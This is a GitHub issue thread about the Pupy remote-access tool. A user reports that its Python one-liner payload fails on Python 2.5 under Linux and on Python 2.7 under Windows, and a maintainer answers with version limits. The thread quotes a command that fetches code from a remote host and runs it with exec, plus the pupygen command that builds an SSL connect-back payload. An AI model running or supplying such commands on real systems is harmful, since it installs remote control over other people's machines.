### ISSUE TITLE
Pupy py/py_oneliner Python 2.5 linux and Python 2.7 windows

### ISSUE THREAD

**Issue by angusonmacgyver** [n1nj4sec/pupy#698]
Selected pupy payload works great with recent python version but crashes on 
2.5:
python -c 'import urllib;exec urllib.urlopen("http://10.11.0.249:8080/index").read()'
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.5/", line 2, in <module>

ImportError: cannot import name imp
from Linux 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

2.7
C:\Users\Administrator>
C:\Users\Administrator>python -c 'import urllib;exec urllib.urlopen("http://10.11.0.249:8080/index").read()'
  File "<string>", line 1
    'import
          ^
SyntaxError: EOL while scanning string literal

On windows 7 with 2.7 python installed.

Payload was generated with:

pupygen -f py_oneliner connect --host $lhost:$lport -t ssl

Any help appreciated. Thanks for a great tool/

**Comment by alxchk** [comment]
Unfortunately pure python payload will work only with 2.7.9 < python < 3.

If it's possible there - use native client.
